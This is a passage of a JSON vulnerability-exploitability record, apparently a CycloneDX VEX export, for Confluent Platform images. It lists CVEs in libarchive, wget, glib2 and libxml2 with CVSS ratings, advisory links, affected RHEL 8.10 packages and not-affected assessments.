          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        805,
        122
      ],
      "description": "A flaw was found in libarchive. This vulnerability allows a remote attacker to trigger a heap overflow by providing a specially crafted tar archive. The issue occurs during the parsing of a PAX extended header containing a malformed SUN.holesdata sparse-file attribute. Successful exploitation could lead to a denial of service, making the system unavailable, or potentially allow for arbitrary code execution, giving the attacker control over the affected system.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-15028"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:38279"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-15028"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2497970"
        },
        {
          "url": "https://github.com/libarchive/libarchive/issues/3251"
        },
        {
          "url": "https://github.com/libarchive/libarchive/pull/3253"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-15028"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8581-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-15028"
        }
      ],
      "published": "2026-07-10T10:16:23+00:00",
      "updated": "2026-08-19T11:16:46+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.3.3-7.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-15146",
      "ratings": [
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "description": "GNU Wget does not validate the IP address provided by an FTP PASV response while operating in FTP passive mode. A malicious FTP server, or an HTTP server that redirects to an FTP URL, can exploit this behavior to redirect Wget\u2019s data connection to an arbitrary IP address and port. This allows an attacker to forge server-side requests (SSRF) from the machine running Wget, potentially accessing localhost services or internal network resources.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-15146"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-15146"
        },
        {
          "url": "https://cgit.git.savannah.gnu.org/cgit/wget.git/commit/?id=4f85853f641863d5915786a8413e1a213726a62b"
        },
        {
          "url": "https://kb.cert.org/vuls/id/564823"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-15146"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8572-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-15146"
        },
        {
          "url": "https://www.kb.cert.org/vuls/id/564823"
        }
      ],
      "published": "2026-07-10T19:17:20+00:00",
      "updated": "2026-07-15T19:16:57+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.19.5-12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-15588",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        770
      ],
      "description": "A denial-of-service and resource exhaustion vulnerability exists within the `GDBus` component of GLib. The `gdbusauth` authentication mechanism fails to enforce proper length limitations on data lines read from a client. An unauthenticated local or remote attacker can exploit this lack of input validation by sending excessively long streams of data, causing the application to consume massive amounts of system memory and CPU, potentially leading to a crash or system hang.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-15588"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:39985"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:40485"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42329"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:55440"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:57015"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-15588"
        },
        {
          "url": "https://bugzilla.redhat.com/2492243"
        },
        {
          "url": "https://bugzilla.redhat.com/2492245"
        },
        {
          "url": "https://bugzilla.redhat.com/2492247"
        },
        {
          "url": "https://bugzilla.redhat.com/2492248"
        },
        {
          "url": "https://bugzilla.redhat.com/2492255"
        },
        {
          "url": "https://bugzilla.redhat.com/2492256"
        },
        {
          "url": "https://bugzilla.redhat.com/2499675"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492243"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492245"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492247"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492248"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492255"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492256"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2499675"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-15588"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58010"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58011"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58012"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58013"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58014"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58015"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-55440.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:55440"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/3985"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-15588.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-55440.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-15588"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-15588"
        }
      ],
      "published": "2026-07-20T12:17:55+00:00",
      "updated": "2026-08-19T18:16:33+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.56.4-170.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image library (glib2 GDBus) whose D-Bus IPC server is never opened by any product code."
      }
    },
    {
      "id": "CVE-2026-16517",
      "ratings": [
        {
          "source": {
            "name": "redhat"
          },
          "score": 2.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"
        }
      ],
      "cwes": [
        190
      ],
      "description": "A signed integer overflow vulnerability was found in libarchive's ZIP writer. In the archive_write_zip_header function in archive_write_set_format_zip.c, when ZIP encryption is enabled and the entry file size is close to INT64_MAX, the addition of the encryption overhead to the entry size overflows int64_t, resulting in undefined behavior. This could lead to incorrect Zip64 extension decisions or potential memory corruption.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-16517"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:43818"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-16517"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2505492"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-16517"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-16517"
        }
      ],
      "published": "2026-07-21T23:17:00+00:00",
      "updated": "2026-08-19T11:16:46+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.3.3-7.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-1757",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.2,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        401
      ],
      "description": "A flaw was identified in the interactive shell of the xmllint utility, part of the libxml2 project, where memory allocated for user input is not properly released under certain conditions. When a user submits input consisting only of whitespace, the program skips command execution but fails to free the allocated buffer. Repeating this action causes memory to continuously accumulate. Over time, this can exhaust system memory and terminate the xmllint process, creating a denial-of-service condition on the local system.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-1757"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:7519"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-1757"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2435940"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/libxml2/-/issues/1009"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1757"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8460-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-1757"
        }
      ],
      "published": "2026-02-02T13:15:58+00:00",
      "updated": "2026-06-17T10:16:28+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.9.7-21.el8_10.6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libxml2@2.9.7-21.el8_10.6?arch=x86_64&distro=redhat-8.10"
